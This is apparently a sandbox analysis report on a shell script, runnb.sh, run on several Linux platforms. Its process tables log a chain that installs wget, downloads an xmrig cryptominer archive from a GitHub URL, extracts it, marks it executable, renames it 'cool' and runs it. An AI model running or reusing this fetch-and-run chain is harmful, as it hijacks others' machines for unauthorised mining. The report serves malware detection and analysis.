Analysis Overview
SHA256: a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
Threat Level: Shows suspicious behavior
The file runnb.sh was found to show suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Reads CPU attributes
Enumerates kernel/hardware configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-10-30 13:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-10-30 13:06
Reported: 2024-10-30 13:12
Platform: ubuntu1804-amd64-20240611-en
Max time kernel: 1s
Max time network: 129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/sudo | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | /usr/bin/snap | N/A |
| File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | /usr/bin/snap | N/A |
| File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | /usr/bin/snap | N/A |
| File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | /usr/bin/snap | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/self/stat | /usr/bin/sudo | N/A |
| File opened for reading | /proc/cgroups | /usr/bin/snap | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/apt | N/A |
| File opened for reading | /proc/cmdline | /usr/bin/snap | N/A |
| File opened for reading | /proc/cmdline | /usr/bin/snap | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/cgroups | /usr/bin/snap | N/A |
| File opened for reading | /proc/cmdline | /usr/bin/snap | N/A |
| File opened for reading | /proc/cgroups | /usr/bin/snap | N/A |
| File opened for reading | /proc/cmdline | /usr/bin/snap | N/A |
| File opened for reading | /proc/filesystems | /bin/tar | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sudo | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/bin/sudo | N/A |
| File opened for reading | /proc/cgroups | /usr/bin/snap | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/fileutl.message.Tv8lpe | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.bJvUo4 | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.Ujb4X0 | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.epORFa | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.4wKluk | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.tUGDrU | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.mY02xY | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.MMujmR | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.VjfRzK | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.kmQrrO | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.HpV0to | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.Vh0yCy | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.TKBu8q | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.Jcx9NA | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.U9uqpu | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.KjCToE | /usr/bin/apt | N/A |
Processes
| Process | Command line |
|---|---|
| /tmp/runnb.sh | /tmp/runnb.sh |
| /usr/bin/sudo | sudo apt install wget |
| /usr/bin/apt | apt install wget |
| /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures |
| /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures |
| /bin/sh | /bin/sh -c [ ! -f /usr/bin/snap ] \|\| /usr/bin/snap advise-snap --from-apt 2>/dev/null \|\| true |
| /usr/bin/snap | /usr/bin/snap advise-snap --from-apt |
| /bin/sh | /bin/sh -c [ ! -f /usr/bin/snap ] \|\| /usr/bin/snap advise-snap --from-apt 2>/dev/null \|\| true |
| /usr/bin/snap | /usr/bin/snap advise-snap --from-apt |
| /bin/sh | /bin/sh -c [ ! -f /usr/bin/snap ] \|\| /usr/bin/snap advise-snap --from-apt 2>/dev/null \|\| true |
| /usr/bin/snap | /usr/bin/snap advise-snap --from-apt |
| /bin/sh | /bin/sh -c [ ! -f /usr/bin/snap ] \|\| /usr/bin/snap advise-snap --from-apt 2>/dev/null \|\| true |
| /usr/bin/snap | /usr/bin/snap advise-snap --from-apt |
| /usr/bin/wget | wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz |
| /bin/tar | tar xvf xmrigtar.tar.gz |
| /bin/chmod | chmod +x xmrig |
| /bin/mv | mv xmrig cool |
| /tmp/cool | ./cool |
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 224.0.0.251:5353 | | udp |
| US | 151.101.193.91:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 1.1.1.1:53 | github.com | udp |
| US | 1.1.1.1:53 | github.com | udp |
| GB | 195.181.164.14:443 | | tcp |
Files
/tmp/fileutl.message.MMujmR
| MD5 | 373fe2f2ef99005d2550a482f09a3e51 |
| SHA1 | 68e6572b55b1e77f7d171ebac7b2579b7a6bd51d |
| SHA256 | 7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5 |
| SHA512 | def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b |
Analysis: behavioral2
Detonation Overview
Submitted: 2024-10-30 13:06
Reported: 2024-10-30 13:12
Platform: debian9-armhf-20240611-en
Max time kernel: 6s
Max time network: 7s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/sudo | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sudo | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/bin/sudo | N/A |
| File opened for reading | /proc/self/stat | /usr/bin/sudo | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/apt | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /bin/tar | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/fileutl.message.feOWda | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.hGyOFa | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.FLz5li | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.rhmRNr | /usr/bin/apt | N/A |
Processes
| Process | Command line |
|---|---|
| /tmp/runnb.sh | /tmp/runnb.sh |
| /usr/bin/sudo | sudo apt install wget |
| /usr/bin/apt | apt install wget |
| /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures |
| /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures |
| /usr/bin/wget | wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz |
| /bin/tar | tar xvf xmrigtar.tar.gz |
| /bin/chmod | chmod +x xmrig |
| /bin/mv | mv xmrig cool |
| /tmp/cool | ./cool |
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 1.1.1.1:53 | github.com | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted: 2024-10-30 13:06
Reported: 2024-10-30 13:12
Platform: debian9-mipsbe-20240611-en
Max time kernel: 117s
Max time network: 150s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/sudo | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/self/stat | /usr/bin/sudo | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/apt | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sudo | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/apt | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/sudo | N/A |
| File opened for reading | /proc/filesystems | /bin/tar | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/bin/sudo | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/fileutl.message.0ksS1M | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.9MdXSo | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.SpDNgo | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.UkZHET | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.Cby9mA | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.ObiKey | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.4SnVT5 | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.ChveDP | /usr/bin/apt | N/A |
Processes
| Process | Command line |
|---|---|
| /tmp/runnb.sh | /tmp/runnb.sh |
| /usr/bin/sudo | sudo apt install wget |
| /usr/sbin/sendmail | sendmail -t |
| /usr/sbin/sendmail | sendmail -t |
| /usr/bin/apt | apt install wget |
| /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures |
| /usr/sbin/exim4 | /usr/sbin/exim4 -Mc 1t67Wc-0000Bg-PL |
| /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures |
| /usr/sbin/exim4 | /usr/sbin/exim4 -Mc 1t67Wi-0000Bd-5p |
| /usr/bin/apt | apt install wget |
| /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures |
| /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures |
| /usr/bin/wget | wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz |
| /bin/tar | tar xvf xmrigtar.tar.gz |
| /bin/chmod | chmod +x xmrig |
| /bin/mv | mv xmrig cool |
| /tmp/cool | ./cool |
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
/var/spool/exim4/input/1t67Wc-0000Bg-PL-D
| MD5 | 29b5f65cec8f10e1d9237bfafd8cfe15 |
| SHA1 | 0f553f30b89e44ffee5818aad2210fd82bf32bd3 |
| SHA256 | b86b2bb584861a5e3b8bf97967009bde0fc62280f39600fd9c234c803aaf6441 |
| SHA512 | 2931246165e2cec85ca12cdd4a9c4cecf9afb4b2d8b2815b850cc9f9439289964965ca15a9641b42dca83429b371d3f769f8af6f5cc5011c691e656c78596887 |
/var/spool/exim4/input/hdr.724
| MD5 | 59c8e7fe07aa10d886a5622d216dc544 |
| SHA1 | e53a9c43d1431f54893a5408a8017743ead8610b |
| SHA256 | 471604ebbe65ddc35263f86d70acc38e8a227fe2cd3bbc390dcbb6d711cfaa80 |
| SHA512 | c9ad288951a0990cee04a91e4ede557b762bce507a22a89c8552792c35c7990e15d707aa0c04b8856951689dd01d9f5edef75334ce51369421b0e453b4213bd3 |
/var/spool/exim4/msglog/1t67Wc-0000Bg-PL
| MD5 | 1ff982473d7d2811859739a172bcf583 |
| SHA1 | d2bbe4a1be37b272af7d0acb7da6ed5a3495c699 |
| SHA256 | 0e77dcd0195ad198b94be3603f8abf5fb697b795e4d930b76608610665ac031d |
| SHA512 | fa52212c6ad9ef9364f22efa1095fde665d4fa4d998ab7fbcc60b41f65a582eb8b6693b0b86021dd106047eaad857703dcd093b30e604f16611321d621c8308f |
/var/mail/user
| MD5 | 595f01a473b87dcc39e302e361f6df08 |
| SHA1 | 25dea5bef0cf97cf31315da0646a0397437ad072 |
| SHA256 | d85665da254724a749f3f45c509c76c71ebda1284c65d6edd8892d9da7124c33 |
| SHA512 | db87eae970e29d06417a57a6d85553745a78ca76fd4e969297a0c41791371612d7ab253633caa146d7968d36b47c59b77f8416e1d4dfd9a2e20b74ae3cb8fa2a |
/var/spool/exim4/input/1t67Wc-0000Bg-PL-J
| MD5 | d7d96d63d643a4ce3e408eba7dfcedc5 |
| SHA1 | c53607f95c5c57beafc1d8266646797a035f76ea |
| SHA256 | 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159 |
| SHA512 | 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3 |
/var/spool/exim4/msglog/1t67Wc-0000Bg-PL
| MD5 | f7c45ad668ded36ddd10c0367e39f6f8 |
| SHA1 | 3a894d2836d02d13f70fc440e809c061ed1ee328 |
| SHA256 | 8f207e2aaa6d3dc408f01d993a6a759d7ddd871b95c3028dc7a1871cf3604bac |
| SHA512 | 9586fa67141a51c7363b884715708683c134402d12f6d8f757055d7e0518174ad2ea9878c79fe4ea510c5a2446ab4c5e94626e6870bac0feaa1f94dd0621e660 |
/var/spool/exim4/input/1t67Wi-0000Bd-5p-D
| MD5 | 8e808517d77ff16d7f6d85e618773d5f |
| SHA1 | c4efef4f2f7fc9bca9dfa463e04221f427e2f868 |
| SHA256 | 39ea94a36c53279733341a715dad7cdead8855014ba1dec922fec93dea206ec3 |
| SHA512 | ed232da15152f741b8fddc799410dad048be911a517c180dd45ce7101414fb68e252771e1f96bf1b7767cd19b132aac0d5d35b66d50eb4eb5e7ba4699bb2ce5a |
/var/spool/exim4/input/hdr.721
| MD5 | 464af924c2dd82cb355ee78804b618f8 |
| SHA1 | 7344b64dd2495ef205f0dbe3bd9c954ca7968bae |
| SHA256 | 032439411b7d4f76fab08cae52b7a24db065a64290fb6199191a7d557c62cf7f |
| SHA512 | 70e7ac84c4a59010c8b0e9e544e456a407cbf4e729996cf2f3dd3be52a491194dc0a8150813d2e514ea24e2ad6822fb0a64e429d382ca626d597f33a48484980 |
/var/spool/exim4/msglog/1t67Wi-0000Bd-5p
| MD5 | ce77a0cffed93d570d31c72c7d613582 |
| SHA1 | 427e46e2284e8904a2dd035571d497e6afcff6fa |
| SHA256 | 1443ec8f0a33ab52ed79e52793f54c5ec1d5608c22acea3ad2aec7a83e6d71f0 |
| SHA512 | e95a638f5e4129bda33556d72b383fb9b2e481e787be2fdda054b4b077b3aa70ba5af6357f07acacfd6a0865d1e3091ee2013db292e200ddd79db3fdc95e4a59 |
/var/mail/user
| MD5 | defb52d953ba1b8cdd8d28da9548691d |
| SHA1 | 0dbe1daa37ad64aa25e312b909bd14d9ea1623e4 |
| SHA256 | 706ae75700886c08a09231c63974a309669ab2b2a35321aca180527c913d2a55 |
| SHA512 | e89a6591192104a776660e1c42a86283a3794cf07323a3ce50ced9595bce81dfa0d1e767d679e6d5f9c3d85eb79445eaa6267c68d167e8b28bc58134a4135487 |
/var/spool/exim4/msglog/1t67Wi-0000Bd-5p
| MD5 | 78dc3e8c66bd615089879ac53d483b98 |
| SHA1 | f9dd7bbbf5c7b447f39a6de989cf24a186571435 |
| SHA256 | 6f405a4e3314b91bea1809bb179fba5e3cecda801b13c2ff1c48640b9984f7d7 |
| SHA512 | dcb52c5cc47f650e08bf6e08fa34fcee7b6f7c3ba864a281668929d17a1cf4a4ced83c196493a5d08a70b7b66f3216f548591e3d6bee2d84ea28554b68046f0a |
Analysis: behavioral4
Detonation Overview
Submitted: 2024-10-30 13:06
Reported: 2024-10-30 13:12
Platform: debian9-mipsel-20240611-en
Max time kernel: 51s
Max time network: 53s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/sudo | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sudo | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/bin/sudo | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/sudo | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /bin/tar | N/A |
| File opened for reading | /proc/self/stat | /usr/bin/sudo | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/apt | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/apt | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/fileutl.message.ueS1Tj | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.khLB3B | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.SYpnjZ | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.EjbMVs | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.5kH4KV | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.FM4QZg | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.X6KWVX | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.JAGxbL | /usr/bin/apt | N/A |
Processes
| Process | Command line |
|---|---|
| /tmp/runnb.sh | /tmp/runnb.sh |
| /usr/bin/sudo | sudo apt install wget |
| /usr/sbin/sendmail | sendmail -t |
| /usr/sbin/sendmail | sendmail -t |
| /usr/bin/apt | apt install wget |
| /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures |
| /usr/sbin/exim4 | /usr/sbin/exim4 -Mc 1t67WX-0000Bd-Tl |
| /usr/sbin/exim4 | /usr/sbin/exim4 -Mc 1t67WX-0000Ba-U9 |
| /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures |
| /usr/bin/apt | apt install wget |
| /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures |
| /usr/bin/dpkg | /usr/bin/dpkg --print-foreign-architectures |
| /usr/bin/wget | wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz |
| /bin/tar | tar xvf xmrigtar.tar.gz |
| /bin/chmod | chmod +x xmrig |
| /bin/mv | mv xmrig cool |
| /tmp/cool | ./cool |
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
/var/spool/exim4/input/1t67WX-0000Bd-Tl-D
| MD5 | 941d420759e94a1bd868c37f625edb0e |
| SHA1 | 07a5df1665607adc1dca3eae8973194d84f33509 |
| SHA256 | 4cebde6c7e7da64d826a429a647e13d1cee779b1dd21a28ba6b4038399f5ab95 |
| SHA512 | e79314a8786b2fe5f34036297e84c0ae7c042edc9566816f1ddce65ae9a173a8f90824df4e36fa9b3fd18d3dbe9577f13115cc7e5659594c777f378b5e4e23fe |
/var/spool/exim4/input/1t67WX-0000Ba-U9-D
| MD5 | fb161a8d77589e42343a69baac6558c3 |
| SHA1 | da1d6196ad814ac6aceb4f8a5c74c42bb6bb77e0 |
| SHA256 | 4ae583fdd30f59a2ce5a6f622d86ca502aea6868045b2b5b46d7e03fa0f9da4d |
| SHA512 | dbe638525b7db65236d525169cfbdf96ff40db7dbf875419897807f141f1a23bdcb728d1a9bdaf914742722e5c7413b5ba61b5c1d5cac9baac1efe78db1c0a7a |
/var/spool/exim4/input/hdr.718
| MD5 | 48799cda21e70d63c321e8447aef7ec8 |
| SHA1 | e4b5ff6d347bc0167a579ee45f3c60214583578f |
| SHA256 | 79add92d542e684b6a9a5a1846af6e95ec7f1f4b43f0278fcaced2c7d29eb2dd |
| SHA512 | 82bcb959b4cf2f0f331bcec83a2bb616553256775028e641a5cb5b74468ffb0a875816c0b62a01383ca4b71bb92f2a8697ebb3e2c95ea876499c7c0e92578fab |
/var/spool/exim4/msglog/1t67WX-0000Bd-Tl
| MD5 | 8325c366e5037ddfc0286eda5fa5b2e2 |
| SHA1 | 542ca7ae5ed8e1b1d405b6362ce51ce2960fff3a |
| SHA256 | 43cc8dd066396ff583c39678b6844c019ad2e2222dc0a6fcdf8415a7df08ffd3 |
| SHA512 | e22a836ef72c3d7816ab190fda793c67d9f526ea008ad9ed627da70dbc5ea640b5447f5b174fa937d7583e10334eb7b4a3e3162d7f3d4bda1fd37fb4f3661718 |
/var/spool/exim4/msglog/1t67WX-0000Ba-U9
| MD5 | 2633f88076d9fc2543fa50f203e0d08f |
| SHA1 | ad6b4fd63cbc7c131c66639152d4f0a16e5f58b8 |
| SHA256 | 750d8a4120dbea512b80ba7b9b284d4c2b52009c2a52d1d106dab24f0bd1eac9 |
| SHA512 | a12152884afdcdb8e2bcad89690f5e105683ce460876123c41a3c2bbb0d65d6e2ba19e394b262bd3bd3a7c7c74397f6c380ec577b49a02ce474cbb12a7f90ef6 |
/var/mail/user
| MD5 | 2e64547594cb07a79be6167095b3421c |
| SHA1 | ab83381e1eb624ee06dbb5513cfc863fb2ec0099 |
| SHA256 | 7cda1aee71c8b2e2ce4133c99388f0e42abc7bd491fc92691db8375ab70933ae |
| SHA512 | 5d9b98f3a027e785edf86ef07acab7978ac5e1cc48c412c2c73fd7a61836ed779ec7f57831a7f4d44d57ae0756cc11f0139f36fb769a0917210da0964b57e55e |
/var/spool/exim4/input/1t67WX-0000Ba-U9-J
| MD5 | d7d96d63d643a4ce3e408eba7dfcedc5 |
| SHA1 | c53607f95c5c57beafc1d8266646797a035f76ea |
| SHA256 | 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159 |
| SHA512 | 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3 |
/var/mail/user
| MD5 | 3306e338f0de9348470695cf0c09db1f |
| SHA1 | 12d9b6006acd4b506cfa50c89ecf0b84e2deb018 |
| SHA256 | a8a474e7234e1a7c4f33c145018f2d235fe2a2a917eea63579cc018384364eac |
| SHA512 | 99f07c204ed386392f5475be50302f644a0197cd65b504c94ede2c169f04d4187d4a5f163094648f14c987913457cf2918ec283b93811dbc19c39971db6e15c3 |
/var/spool/exim4/msglog/1t67WX-0000Ba-U9
| MD5 | e06795efeae2b189486bac86b73396f5 |
| SHA1 | 7cedd0a0713397d1d097712f49dfe56ce0280a48 |
| SHA256 | c6a38cfc3b0bcd0da3e28339e14c1020e95013cb9ec230580bac622e3efc1485 |
| SHA512 | a601fe93788026af3440dbaab44747e3915fccf44956526cfd79f676553e6815f45dd697e7dac099a5008be9660f448415bb71afdf990aed6b6bba3adbbf98ab |
/var/spool/exim4/msglog/1t67WX-0000Bd-Tl
| MD5 | ea08c55f299f53254a3c5d4c3e80cacd |
| SHA1 | 4dd0cea75a44decb69821b37ae43ad3b31bf266b |
| SHA256 | d574187e37c7e4c775b3f08b1fc37fb678c54fd6af681f947808c9e474c7c1b9 |
| SHA512 | d783a6ab3b30114c7a5c19ac4c8dc95abf482967d0b5f061121e24e9132bc7ab894f51b684664d1899a100814548c5f7ab7769b38d52affbebb8ca9c14dc94ee |